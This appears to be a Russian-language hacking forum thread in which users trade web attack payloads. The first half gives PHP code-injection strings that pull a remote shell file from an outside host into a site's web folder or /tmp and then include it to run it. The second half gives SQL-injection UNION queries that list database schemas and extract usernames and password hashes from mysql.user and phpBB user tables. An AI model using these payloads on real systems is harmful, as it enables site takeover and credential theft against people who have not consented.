При выполнении запроса типа: site.ru/index.php?id=phpinfo(); Могу просмотреть пхпинфо. А как залить файл?

id=include("http://yoursite.com/yourfile");

id=copy($_GET[file1],$_GET[file2]);&file1=http://yoursite.com/yourfile.txt&file2=/yourpath/to/webfolder/

например

file1=http://microsoft.com/shell.txt&file2=/var/www/html/shell.php

если не знаешь полный путь к сайту to копируй шелл в папку /tmp

потом делай локальный инклуд
include("/tmp/shell.php");

Есть SQL inj.
Перебрал все таблицы и колонки, но не могу вывести информацию из этих таблиц.
5 ветка.
1,2,3,4,5,passwords,7+from+site_users--
Надо как бэ указать юзера БД, чтобы вывести информацию? Но как это сделать?

1,2,3,4,5,schema_name,7+from+information_schema.sc hemata--

ок, ну как вывести password указв при этом юзверя БД?

select+1,2,3,4,5,password,7+from+mysql.user+where+ user='имя юзера'

т.е. ?
1,2,3,4,5,username,7+from+phpbb_users--
и user() - u34129

А, сори не так понял, я думал тебе надо юзера, под которым работает БД )
Если нужно вывести пароль нужного пользователя из таблицы phpbb_users, то вот так
select+1,2,3,4,5,concat_ws(0x3a,username,user_pass word),7+from+phpbb_users+where+username='имя юзера'
и подставь свои значения колонок, по дефолту для phpbb, как мне помниться это username и user_password

Первый раз ты правильно понял
мне как раз вот это и нужно
Просто помоги составить запрос с теми данными